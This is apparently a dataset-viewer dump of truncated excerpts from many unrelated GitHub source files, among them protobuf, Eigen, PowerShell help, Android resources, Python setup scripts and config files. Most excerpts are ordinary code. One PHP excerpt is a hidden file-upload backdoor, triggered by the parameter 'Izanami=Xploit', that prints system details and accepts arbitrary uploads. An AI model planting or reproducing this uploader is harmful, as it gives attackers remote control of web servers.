text stringlengths 2 99.9k | meta dict |
|---|---|
// Protocol Buffers - Google's data interchange format
// Copyright 2008 Google Inc. All rights reserved.
// http://code.google.com/p/protobuf/
//
// Redistribution and use in source and binary forms, with or without
// modification, are permitted provided that the following conditions are
// met:
//
// * Redistri... | {
"pile_set_name": "Github"
} |
<!DOCTYPE html>
<html>
<head>
<title>SCALe2 : User Roles</title>
<link rel="stylesheet" href="styles/site.css" type="text/css" />
<META http-equiv="Content-Type" content="text/html; charset=UTF-8">
</head>
<body class="theme-default aui-theme-default">
<div id="page">
... | {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="utf-8"?>
<adaptive-icon xmlns:android="http://schemas.android.com/apk/res/android">
<background android:drawable="@drawable/ic_launcher_background" />
<foreground android:drawable="@drawable/ic_launcher_foreground" />
</adaptive-icon> | {
"pile_set_name": "Github"
} |
---
external help file: Microsoft.PowerShell.PSReadLine2.dll-Help.xml
keywords: powershell,cmdlet
Locale: en-US
Module Name: PSReadLine
ms.date: 12/07/2018
online version: https://docs.microsoft.com/powershell/module/psreadline/remove-psreadlinekeyhandler?view=powershell-6&WT.mc_id=ps-gethelp
schema: 2.0.0
title: Remov... | {
"pile_set_name": "Github"
} |
var SERVER = "http://127.0.0.1:8888/";
var messages = '';
var message_timer = undefined;
var last_send = undefined;
var blockingWebRequest = false;
var block = [];
var block_domains = [];
var block_domains_except = [];
var headers = {};
var overrideHosts = {};
var send_messages = function() {
message_timer = undefin... | {
"pile_set_name": "Github"
} |
import os
import platform
import subprocess
import time
from setuptools import Extension, dist, find_packages, setup
from torch.utils.cpp_extension import BuildExtension, CUDAExtension
dist.Distribution().fetch_build_eggs(['Cython', 'numpy>=1.11.1'])
import numpy as np # noqa: E402
from Cython.Build import cythonize... | {
"pile_set_name": "Github"
} |
# ############################################################
# Importing - Same For All Render Layer Tests
# ############################################################
import unittest
import os
import sys
from view_layer_common import *
# ############################################################
# Testing
# ... | {
"pile_set_name": "Github"
} |
package com.open.net.client.structures.message;
import java.util.LinkedList;
/**
* author : long
* created on : 2017/11/30
* description : 读队列
*/
public final class MessageReadQueen {
private MessageBuffer mReadMessageBuffer = new MessageBuffer();
public LinkedList<Message> mReadQ... | {
"pile_set_name": "Github"
} |
/*
* Copyright (C) Sistina Software, Inc. 1997-2003 All rights reserved.
* Copyright (C) 2004-2011 Red Hat, Inc. All rights reserved.
*
* This copyrighted material is made available to anyone wishing to use,
* modify, copy, or redistribute it subject to the terms and conditions
* of the GNU General Public Licen... | {
"pile_set_name": "Github"
} |
---
title: Using Query Bind Parameters
---
<!--
Licensed to the Apache Software Foundation (ASF) under one or more
contributor license agreements. See the NOTICE file distributed with
this work for additional information regarding copyright ownership.
The ASF licenses this file to You under the Apache License, Versi... | {
"pile_set_name": "Github"
} |
//
// FPEnvironment_WIN32.h
//
// Library: Foundation
// Package: Core
// Module: FPEnvironment
//
// Definitions of class FPEnvironmentImpl for WIN32.
//
// Copyright (c) 2004-2006, Applied Informatics Software Engineering GmbH.
// and Contributors.
//
// SPDX-License-Identifier: BSL-1.0
//
#ifndef Foundation_FPEnv... | {
"pile_set_name": "Github"
} |
// Copyright (c) 2005 DMTF. All rights reserved.
[Version ( "2.8.0" ),
UMLPackagePath ( "CIM::Interop" ),
Description (
"A ObjectManagerAdapter is a Service of the CIM Object Manager. "
"An adapter can be any service of the Object Manager that needs "
"to be managed (e.g. start... | {
"pile_set_name": "Github"
} |
// This file is part of Eigen, a lightweight C++ template library
// for linear algebra.
//
// Copyright (C) 2014 Benoit Steiner <benoit.steiner.goog@gmail.com>
// Copyright (C) 2013 Christian Seiler <christian@iwakd.de>
//
// This Source Code Form is subject to the terms of the Mozilla
// Public License v. 2.0. If a c... | {
"pile_set_name": "Github"
} |
POM_ARTIFACT_ID=assertj-android-cardview-v7
POM_NAME=AssertJ for Android CardView v7
POM_PACKAGING=aar
| {
"pile_set_name": "Github"
} |
$(document).ready(function() {
module("String extensions");
test("underscore not included", function() {
raises(function() { _("foo") }, /TypeError/);
});
test("provides standalone functions", function() {
equal(typeof _.str.trim, "function");
});
});
| {
"pile_set_name": "Github"
} |
/**
* @fileoverview
* A tree widget to display the internal structure of chem object (such as ChemSpace, Molecule and so on).
* @author Partridge Jiang
*/
/*
* requires /lan/classes.js
* requires /utils/kekule.utils.js
* requires /widgets/kekule.widget.nestedContainers.js
* requires /widgets/commonCtrls/kekule... | {
"pile_set_name": "Github"
} |
---
title: "Getting Started"
menu:
main:
parent: "contributing"
identifier: "getting started"
weight: 1
---
# Getting Started
Welcome! This guide covers how to get started contributing to kind.
## 1. Read the Kubernetes community guidelines
Make sure to read you read the [Kubernetes community guideline... | {
"pile_set_name": "Github"
} |
package request
import (
"time"
"github.com/aws/aws-sdk-go/aws"
"github.com/aws/aws-sdk-go/aws/awserr"
)
// Retryer is an interface to control retry logic for a given service.
// The default implementation used by most services is the client.DefaultRetryer
// structure, which contains basic retry logic using expo... | {
"pile_set_name": "Github"
} |
# vim-perl
[](https://travis-ci.org/vim-perl/vim-perl)
This is the aggregation of all the various Perl-related syntax and
helper files for Perl 5.
For Perl 6 files, please see [vim-perl6](https://github.com/vim-perl/vim-perl6).
# Installatio... | {
"pile_set_name": "Github"
} |
// +build !ignore_autogenerated
/*
Copyright The Kubernetes Authors.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable l... | {
"pile_set_name": "Github"
} |
//-------------------------------------------------------------------------------------------------------
// Copyright (C) Microsoft. All rights reserved.
// Licensed under the MIT license. See LICENSE.txt file in the project root for full license information.
//---------------------------------------------------------... | {
"pile_set_name": "Github"
} |
"""
Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.
SPDX-License-Identifier: MIT-0
"""
import six
from cfnlint.rules import CloudFormationLintRule
from cfnlint.rules import RuleMatch
class AuroraDBInstanceProperties(CloudFormationLintRule):
"""Aurora DB instances have a lot properties that can'... | {
"pile_set_name": "Github"
} |
/*
* Copyright (c) 2011-2019, Peter Abeles. All Rights Reserved.
*
* This file is part of BoofCV (http://boofcv.org).
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www... | {
"pile_set_name": "Github"
} |
require({
"baseUrl": "./scripts/",
"paths": {
"jquery": "http://ajax.microsoft.com/ajax/jQuery/jquery-1.4.4.min"
//"jquery": "http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min"
},
priority: ['jquery']
});
define(["jquery.gamma", "jquery.epsilon"], function() {
$(function... | {
"pile_set_name": "Github"
} |
## 1.10.1
### Fixes
- Update dependencies (#389) [9f5eecd]
## 1.10.0
### Features
- Add HaveHTTPStatusMatcher (#378) [f335c94]
- Changed matcher for content-type in VerifyJSONRepresenting (#377) [6024f5b]
- Make ghttp usable with x-unit style tests (#376) [c0be499]
- Implement PanicWith matcher (#381) [f8032b4]
## ... | {
"pile_set_name": "Github"
} |
<?php
/**
* Figlet CAPTCHA.
*
* PHP version 7
*
* Copyright (C) Villanova University 2020.
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License version 2,
* as published by the Free Software Foundation.
*
* This program is distributed... | {
"pile_set_name": "Github"
} |
import { inject as service } from '@ember/service';
import Component from '@ember/component';
import Errors from 'ui/utils/errors';
import layout from './template';
import {
get, set, observer, computed, setProperties
} from '@ember/object';
import { on } from '@ember/object/evented';
export default Component.extend... | {
"pile_set_name": "Github"
} |
/*
* Copyright 2017-2020 Baidu Inc.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed... | {
"pile_set_name": "Github"
} |
//----------------------------------------------
// NGUI: Next-Gen UI kit
// Copyright © 2011-2014 Tasharen Entertainment
//----------------------------------------------
using UnityEngine;
using System.Collections.Generic;
/// <summary>
/// Glyph structure used by BMFont. For more information see http://... | {
"pile_set_name": "Github"
} |
<?php
error_reporting(0);
set_time_limit(0);
if($_GET['Izanami']=="Xploit"){
echo "<center><b>Uname:".php_uname()."<br></b>";
echo '<font color="black" size="4">';
if(isset($_POST['Submit'])){
$filedir = "";
$maxfile = '2000000';
$mode = '0644';
$userfile_name = $_FILES['image']['name'];... | {
"pile_set_name": "Github"
} |
*> \brief \b CHESWAPR applies an elementary permutation on the rows and columns of a Hermitian matrix.
*
* =========== DOCUMENTATION ===========
*
* Online html documentation available at
* http://www.netlib.org/lapack/explore-html/
*
*> \htmlonly
*> Download CHESWAPR + dependencies
*> <a href="http://www.n... | {
"pile_set_name": "Github"
} |
package org.elixir_lang.beam.chunk.debug_info.v1.erl_abstract_code.abstract_code_compiler_options.abstract_code
import com.ericsson.otp.erlang.OtpErlangObject
import com.ericsson.otp.erlang.OtpErlangTuple
import org.elixir_lang.beam.chunk.debug_info.v1.erl_abstract_code.abstract_code_compiler_options.AbstractCode.ifTa... | {
"pile_set_name": "Github"
} |
#pragma clang diagnostic ignored "-Wmissing-prototypes"
#pragma clang diagnostic ignored "-Wmissing-braces"
#include <metal_stdlib>
#include <simd/simd.h>
using namespace metal;
template<typename T, size_t Num>
struct spvUnsafeArray
{
T elements[Num ? Num : 1];
thread T& operator [] (size_t pos) thread
... | {
"pile_set_name": "Github"
} |
Name: var39
Rank: 2
Dimensions: 2 x 1
Class Type: Structure
Data Type: Structure
Fields[4] {
Name: field1
Rank: 2
Dimensions: 1 x 1
Class Type: Single Precision Array (complex)
Data Type: IEEE 754 single-precision
{
1 + 51i
}
Name: field2
Rank: 2
Dimensions: 3 x 4
Class Type: Sing... | {
"pile_set_name": "Github"
} |
def form_builder(parts):
global _mimifiers
form_mime = mimify('multipart', _subtype = 'form-data')
for props in parts:
_name = props.get('name')
_type = props.get('type')
_val = props.get('value')
_kws = props.get('kws', {})
disp_kws = props.get('disposition... | {
"pile_set_name": "Github"
} |
/* Generated by RuntimeBrowser.
*/
@protocol MSPHistoryEntryRoute <MSPHistoryEntry>
@required
- (GEOComposedWaypoint *)endWaypoint;
- (bool)isFailed;
- (bool)navigationWasInterrupted;
- (GEOURLRouteHandle *)routeHandle;
- (GEOComposedWaypoint *)startWaypoint;
- (long long)transportType;
@end
| {
"pile_set_name": "Github"
} |
// Code generated by private/model/cli/gen-api/main.go. DO NOT EDIT.
// Package comprehend provides the client and types for making API
// requests to Amazon Comprehend.
//
// Amazon Comprehend is an AWS service for gaining insight into the content
// of documents. Use these actions to determine the topics contained i... | {
"pile_set_name": "Github"
} |
package org.how.tomcat.works.ex02;
import java.net.URL;
import java.net.URLClassLoader;
import java.net.URLStreamHandler;
import java.io.File;
import java.io.IOException;
import javax.servlet.Servlet;
import javax.servlet.ServletRequest;
import javax.servlet.ServletResponse;
public class ServletProcessor2 {
public... | {
"pile_set_name": "Github"
} |
{
"ctm": {
"ctm_version": 1,
"type": "ctm",
"textures": [
"chisel:blocks/dirt/reinforcedDirt-ctm"
]
}
} | {
"pile_set_name": "Github"
} |
// Protocol Buffers for Go with Gadgets
//
// Copyright (c) 2013, The GoGo Authors. All rights reserved.
// http://github.com/gogo/protobuf
//
// Redistribution and use in source and binary forms, with or without
// modification, are permitted provided that the following conditions are
// met:
//
// * Redistributio... | {
"pile_set_name": "Github"
} |
/*-
* #%L
* rapidoid-rest
* %%
* Copyright (C) 2014 - 2020 Nikolche Mihajlovski and contributors
* %%
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/li... | {
"pile_set_name": "Github"
} |
open Core_kernel
let () =
Random.self_init();
let n = 1 + Random.int 10
and k = 1 + Random.int 100 in
printf "%d %d\n" n k;
for i = 1 to n do
List.init 3 (fun _ -> Random.int k |> Int.to_string)
|> String.concat ~sep:" " |> print_endline
done
| {
"pile_set_name": "Github"
} |
var SummaryPart = require('../../models/summaryPart');
var indexLevels = require('./indexLevels');
/**
Returns a new Summary with a part inserted at given index
@param {Summary} summary
@param {Part} part
@param {Number} index
@return {Summary}
*/
function insertPart(summary, part, index) {
pa... | {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="utf-8" ?>
<Patch>
<Operation Class="PatchOperationSequence">
<success>Always</success>
<operations>
<li Class="CombatExtended.PatchOperationFindMod">
<modName>[RH] Faction: Umbra Company</modName>
</li>
<!-- ========== Reduce meals and medicine carried by all pawns ====... | {
"pile_set_name": "Github"
} |
using System;
using Coypu.Drivers.Selenium;
namespace Coypu
{
/// <summary>
/// Global configuration settings
/// </summary>
public class SessionConfiguration : Options
{
const string DEFAULT_APP_HOST = "localhost";
const int DEFAULT_PORT = 80;
private... | {
"pile_set_name": "Github"
} |
fileFormatVersion: 2
guid: df0ac90e67a8c33408b929ad40c1ab34
timeCreated: 1453913004
licenseType: Store
TextureImporter:
fileIDToRecycleName: {}
serializedVersion: 2
mipmaps:
mipMapMode: 0
enableMipMap: 1
linearTexture: 0
correctGamma: 0
fadeOut: 0
borderMipMap: 0
mipMapFadeDistanceStar... | {
"pile_set_name": "Github"
} |
object Test {
def main(args: Array[String]): Unit = {
assert(5 == (5: java.lang.Integer))
assert((5: java.lang.Integer) == 5)
}
}
| {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="utf-8"?>
<resources>
<color name="colorPrimary">#3F51B5</color>
<color name="colorPrimaryDark">#303F9F</color>
<color name="colorAccent">#FF4081</color>
</resources>
| {
"pile_set_name": "Github"
} |
#
# Copyright (c) 2005, 2012, Oracle and/or its affiliates. All rights reserved.
# DO NOT ALTER OR REMOVE COPYRIGHT NOTICES OR THIS FILE HEADER.
#
# This code is free software; you can redistribute it and/or modify it
# under the terms of the GNU General Public License version 2 only, as
# published by the Free Softwar... | {
"pile_set_name": "Github"
} |
/*
* Syborg Interval Timer.
*
* Copyright (c) 2008 CodeSourcery
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use... | {
"pile_set_name": "Github"
} |
const util = require('util')
const log = require('electron-log')
const base64url = require('base64url')
const readSubConfigBySection = (config, sect) => {
var subConfigNames = []
var currSect = ''
config.match(/[^\r\n]+/g).forEach((line) => {
line = removeLineComments(line)
const s = getSection(line)
... | {
"pile_set_name": "Github"
} |
/* -*- Mode: C++; tab-width: 2; indent-tabs-mode: nil; c-basic-offset: 2 -*- */
/* ***** BEGIN LICENSE BLOCK *****
* Version: MPL 1.1/GPL 2.0/LGPL 2.1
*
* The contents of this file are subject to the Mozilla Public License Version
* 1.1 (the "License"); you may not use this file except in compliance with
* the Lic... | {
"pile_set_name": "Github"
} |
package chassis_test
import (
"os"
"path/filepath"
"reflect"
"testing"
"github.com/go-chassis/go-chassis/v2"
"github.com/go-chassis/go-chassis/v2/core/config"
"github.com/go-chassis/go-chassis/v2/core/lager"
"github.com/go-chassis/go-chassis/v2/core/server"
"github.com/go-chassis/go-chassis/v2/pkg/util/fileu... | {
"pile_set_name": "Github"
} |
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
<meta name="referrer" content="origin-when-crossorigin">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<base target="_blank">
<title> Kiwi IRC </title>
<link rel="shortc... | {
"pile_set_name": "Github"
} |
{
"compilerOptions": {
"module": "commonjs",
"lib": [
"es6"
],
"noImplicitAny": true,
"noImplicitThis": true,
"strictNullChecks": true,
"strictFunctionTypes": true,
"baseUrl": "../",
"typeRoots": [
"../"
],
... | {
"pile_set_name": "Github"
} |
const Gi = imports._gi
const System = imports.system
const GObject = imports.gi.GObject
const Clutter = imports.gi.Clutter
const Shell = imports.gi.Shell
const AppSystem = imports.gi.Shell.AppSystem.get_default()
const WinTracker = imports.gi.Shell.WindowTracker.get_default()
const Main = ... | {
"pile_set_name": "Github"
} |
/*
LiCK Library for ChucK.
Copyright (c) 2007-2020 held jointly by the individual authors.
This file is part of LiCK.
LiCK is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version... | {
"pile_set_name": "Github"
} |
<test-metadata>
<benchmark-version>1.2</benchmark-version>
<category>xss</category>
<test-number>01054</test-number>
<vulnerability>false</vulnerability>
<cwe>79</cwe>
</test-metadata>
| {
"pile_set_name": "Github"
} |
/* Nehalem gmp-mparam.h -- Compiler/machine parameter header file.
Copyright 1991, 1993, 1994, 2000, 2001, 2002, 2003, 2004, 2005, 2006, 2007,
2008, 2009, 2010, 2011, 2012 Free Software Foundation, Inc.
This file is part of the GNU MP Library.
The GNU MP Library is free software; you can redistribute it and/or modif... | {
"pile_set_name": "Github"
} |
<?xml version='1.0' encoding='UTF-8'?>
<resources>
<string name="cant_call">Nu pot apela</string>
<string name="rewrite">Rescriere</string>
<string name="stop_processing">Opreste procesarea</string>
<string name="direct_call">Apeleaza direct</string>
<string name="auto_answer">Raspuns automat</string>
<stri... | {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="utf-8"?>
<!--
~ This file is part of the PhotoEditor Software Development Kit.
~
~ Copyright (C) 2019 img.ly GmbH <contact@img.ly>
~ All rights reserved.
~
~ Redistribution and use in source and binary forms, without
~ modification, are permitted provided that the following l... | {
"pile_set_name": "Github"
} |
Motoya L Cider W3 and L Mulberry W3 TrueType fonts from Android.
| {
"pile_set_name": "Github"
} |
/*
Copyright (c) 2003-2014, CKSource - Frederico Knabben. All rights reserved.
For licensing, see LICENSE.md or http://ckeditor.com/license
*/
CKEDITOR.plugins.setLang( 'toolbar', 'en-au', {
toolbarCollapse: 'Collapse Toolbar', // MISSING
toolbarExpand: 'Expand Toolbar', // MISSING
toolbarGroups: {
document: 'Doc... | {
"pile_set_name": "Github"
} |
{$IFDEF OGC_INTERFACE}
{$ifdef _LANGUAGE_ASSEMBLY}
(* Condition Register Bit Fields *)
const
cr0 = 0;
cr1 = 1;
cr2 = 2;
cr3 = 3;
cr4 = 4;
cr5 = 5;
cr6 = 6;
cr7 = 7;
(* General Purpose Registers (GPRs) *)
r0 = 0;
r1 = 1;
sp = 1;
r2 = 2;
toc = 2;
r3 = 3;
r4 = 4;
r5 = 5;
r6 = 6;
... | {
"pile_set_name": "Github"
} |
import React from 'react'
import PropTypes from 'prop-types'
const Picker = ({ value, onChange, options }) => (
<span>
<h1>{value}</h1>
<select onChange={e => onChange(e.target.value)}
value={value}>
{options.map(option =>
<option value={option} key={option}>
{option}
... | {
"pile_set_name": "Github"
} |
% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/direction.R
\name{direction}
\alias{direction}
\title{Directions from data cells to headers}
\description{
How to use functions with a \code{direction} parameter.
Data cells relate to header cells by their proximity in a given direction.
The... | {
"pile_set_name": "Github"
} |
# Tarantino
This folder contains data behind the story [A Complete Catalog Of Every Time Someone Cursed Or Bled Out In A Quentin Tarantino Movie](http://fivethirtyeight.com/features/complete-catalog-curses-deaths-quentin-tarantino-films).
Header | Definition
---|---------
`movie` | Film title
`type` | Whether the eve... | {
"pile_set_name": "Github"
} |
# Managing backend with Azure Kubernetes Service (AKS)
## Key Takeaway
There are 2 features for the developers and operations team to consider as key takeaways from this demo:
1. **Introduction to AKS** - Azure Kubernetes Service (AKS) allows you to managed Kubernetes based orchestration service. It provides auto-pa... | {
"pile_set_name": "Github"
} |
import getBinsFromPkg from '@pnpm/package-bins'
import path = require('path')
import test = require('tape')
test('getBinsFromPkg()', async (t) => {
t.deepEqual(
await getBinsFromPkg({
bin: 'one-bin',
name: 'one-bin',
version: '1.0.0',
}, process.cwd()),
[{
name: 'one-bin',
p... | {
"pile_set_name": "Github"
} |
/***************************************************************************/
/* */
/* ftmisc.h */
/* */
/* Mi... | {
"pile_set_name": "Github"
} |
within Buildings.Fluid.Chillers;
model AbsorptionIndirectSteam
"Indirect steam heated absorption chiller based on performance curves"
extends Buildings.Fluid.Interfaces.FourPortHeatMassExchanger(
T1_start = 273.15+25,
T2_start = 273.15+5,
m1_flow_nominal= per.mCon_flow_nominal,
m2_flow_nominal... | {
"pile_set_name": "Github"
} |
/*
This Java source file was generated by test-to-java.xsl
and is a derived work from the source document.
The source document contained the following notice:
Copyright (c) 2001 World Wide Web Consortium,
(Massachusetts Institute of Technology, Institut National de
Recherche en Informatique et en Automatique, Keio... | {
"pile_set_name": "Github"
} |
function varargout = override(varargin)
% VL_OVERRIDE Override structure subset
% CONFIG = VL_OVERRIDE(CONFIG, UPDATE) copies recursively the fileds
% of the structure UPDATE to the corresponding fields of the
% struture CONFIG.
%
% Usually CONFIG is interpreted as a list of paramters with their
% default va... | {
"pile_set_name": "Github"
} |
"""distutils.command.x
Implements the Distutils 'x' command.
"""
# created 2000/mm/dd, John Doe
__revision__ = "$Id$"
from distutils.core import Command
class x(Command):
# Brief (40-50 characters) description of the command
description = ""
# List of option tuples: long name, short name (None if no... | {
"pile_set_name": "Github"
} |
fileFormatVersion: 2
guid: eec785c5f1463f746a6ded89f150f845
timeCreated: 1501397127
licenseType: Store
MonoImporter:
serializedVersion: 2
defaultReferences: []
executionOrder: 0
icon: {instanceID: 0}
userData:
assetBundleName:
assetBundleVariant:
| {
"pile_set_name": "Github"
} |
; SICP exercise 5.12
;
; The simulator can be used to help determine the data paths required for
; implementing a machine with a given controller. Extend the assembler to
; store the following information in the machine model:
;
; * a list of all instructions, with duplicates removed, sorted by instruction
; type (as... | {
"pile_set_name": "Github"
} |
{
"id": "overlay_male_worn_scarf",
"fg": ["scarf_m"],
"bg": []
}
| {
"pile_set_name": "Github"
} |
import re
import sys
# Write the config.c file
never = ['marshal', '__main__', '__builtin__', 'sys', 'exceptions', '_warnings']
def makeconfig(infp, outfp, modules, with_ifdef=0):
m1 = re.compile('-- ADDMODULE MARKER 1 --')
m2 = re.compile('-- ADDMODULE MARKER 2 --')
while 1:
line = in... | {
"pile_set_name": "Github"
} |
/*
* Copyright 2000-2016 JetBrains s.r.o.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agre... | {
"pile_set_name": "Github"
} |
StartFontMetrics 2.0
Comment Copyright (c) 1985, 1987, 1989, 1991 Adobe Systems Incorporated. All Rights Reserved.
Comment Creation Date: Tue May 28 16:56:07 1991
Comment UniqueID 35034
Comment VMusage 31030 37922
FontName NewCenturySchlbk-BoldItalic
FullName New Century Schoolbook Bold Italic
FamilyName New Century S... | {
"pile_set_name": "Github"
} |
<cfoutput>
start:specificlayout
#includeContent()#
end:specificlayout
</cfoutput> | {
"pile_set_name": "Github"
} |
*> \brief \b CLAHRD reduces the first nb columns of a general rectangular matrix A so that elements below the k-th subdiagonal are zero, and returns auxiliary matrices which are needed to apply the transformation to the unreduced part of A.
*
* =========== DOCUMENTATION ===========
*
* Online html documentation availa... | {
"pile_set_name": "Github"
} |
/**
* Copyright (C) 2011 Brian Ferris <bdferris@onebusaway.org>
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless requ... | {
"pile_set_name": "Github"
} |
// --------------------------------------------------------------------------
// OpenMS -- Open-Source Mass Spectrometry
// --------------------------------------------------------------------------
// Copyright The OpenMS Team -- Eberhard Karls University Tuebingen,
// ETH Zurich, and Freie Universit... | {
"pile_set_name": "Github"
} |
#
# CDDL HEADER START
#
# The contents of this file are subject to the terms
# of the Common Development and Distribution License
# (the "License"). You may not use this file except
# in compliance with the License.
#
# You can obtain a copy of the license at
# src/OPENSOLARIS.LICENSE
# or http://www.opensolaris.org/o... | {
"pile_set_name": "Github"
} |
// Copyright (c) Microsoft Corporation.
// Licensed under the MIT License.
namespace BuildXL.Native.IO
{
/// <summary>
/// Constants that are used for file I/O inside the Native layer
/// </summary>
public static class NativeIOConstants
{
/// <summary>
/// FSCTL_READ_FILE... | {
"pile_set_name": "Github"
} |
// Copyright (c) 2016 The Zcash developers
// Distributed under the MIT software license, see the accompanying
// file COPYING or https://www.opensource.org/licenses/mit-license.php .
#include "asyncrpcoperation.h"
#include <boost/uuid/uuid.hpp>
#include <boost/uuid/uuid_generators.hpp>
#include <boost/uuid/uuid_io.h... | {
"pile_set_name": "Github"
} |
<Project Sdk="Microsoft.NET.Sdk.Web">
<PropertyGroup>
<TargetFramework>netcoreapp2.1</TargetFramework>
<DockerDefaultTargetOS>Linux</DockerDefaultTargetOS>
<UserSecretsId>57bcf1e9-cc41-49b6-b2eb-edca5c429e52</UserSecretsId>
<RootNamespace>ContosoTravel.Web.Host.DataService</RootNamespace>
<Assemb... | {
"pile_set_name": "Github"
} |
using System;
using System.Collections.Generic;
using System.Linq;
namespace PhysX.Samples.EventsSample
{
public class Program
{
[STAThread]
static void Main(string[] args)
{
new EventsSample();
}
}
} | {
"pile_set_name": "Github"
} |
import {
bootstrapModeler,
inject
} from 'test/TestHelper';
import modelingModule from 'src/features/modeling';
import coreModule from 'src/core';
describe('features/modeling - delete elements', function() {
var testModules = [ coreModule, modelingModule ];
var inputDataXML = require('../../../fixtures/dmn... | {
"pile_set_name": "Github"
} |
package org.smpte_ra.schemas.st2067_2_2013;
import java.util.ArrayList;
import java.util.List;
import javax.xml.bind.annotation.XmlAccessType;
import javax.xml.bind.annotation.XmlAccessorType;
import javax.xml.bind.annotation.XmlAnyElement;
import javax.xml.bind.annotation.XmlAttribute;
import javax.xml.bind.annotati... | {
"pile_set_name": "Github"
} |
exports.abc = 1;
exports.def = require("./other.js");
| {
"pile_set_name": "Github"
} |
//! Constants for the Zcash main network.
/// The mainnet coin type for ZEC, as defined by [SLIP 44].
///
/// [SLIP 44]: https://github.com/satoshilabs/slips/blob/master/slip-0044.md
pub const COIN_TYPE: u32 = 133;
/// The HRP for a Bech32-encoded mainnet [`ExtendedSpendingKey`].
///
/// Defined in [ZIP 32].
///
/// ... | {
"pile_set_name": "Github"
} |
//
// Generated by class-dump 3.5 (64 bit).
//
// class-dump is Copyright (C) 1997-1998, 2000-2001, 2004-2013 by Steve Nygard.
//
#import "NSObject.h"
@class IMAPGateway, NSArray, NSMutableArray, NSString;
@interface IMAPMailbox : NSObject
{
id <IMAPMailboxDelegate> _delegate;
unsigned long long _exi... | {
"pile_set_name": "Github"
} |
cheats = 6
cheat0_desc = "Press L Ability Max"
cheat0_code = "94000130+FDFF0000+120F19EC+000003E8+D0000000+00000000"
cheat0_enable = false
cheat1_desc = "Press X Block is 999"
cheat1_code = "94000136+FFFE0000+B20F19E0+00000000+1000016C+000003E7+D2000000+00000000"
cheat1_enable = false
cheat2_desc = "All Stage in Sto... | {
"pile_set_name": "Github"
} |
/*
* JBoss, Home of Professional Open Source
* Copyright 2014, Red Hat, Inc., and individual contributors
* by the @authors tag. See the copyright.txt in the distribution for a
* full listing of individual contributors.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this fi... | {
"pile_set_name": "Github"
} |
<?php
namespace Illuminate\Queue\Connectors;
use Aws\Sqs\SqsClient;
use Illuminate\Support\Arr;
use Illuminate\Queue\SqsQueue;
class SqsConnector implements ConnectorInterface
{
/**
* Establish a queue connection.
*
* @param array $config
* @return \Illuminate\Contracts\Queue\Queue
*/
... | {
"pile_set_name": "Github"
} |
// Licensed to the .NET Foundation under one or more agreements.
// The .NET Foundation licenses this file to you under the MIT license.
// This file isn't built into the .csproj in the runtime libraries but is consumed by Mono.
using System.Runtime.Serialization;
namespace System.Drawing.Printing
{
partial clas... | {
"pile_set_name": "Github"
} |
#!/usr/bin/clitoris ## -*- shell-script -*-
$ ! dconv "2015-2015-00-12-12"
$
## dconv.120.clit ends here
| {
"pile_set_name": "Github"
} |
fun some(a : Statement<caret>)
// INVOCATION_COUNT: 1
// EXIST: { lookupString:"Statement", tailText:" (java.sql)" } | {
"pile_set_name": "Github"
} |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.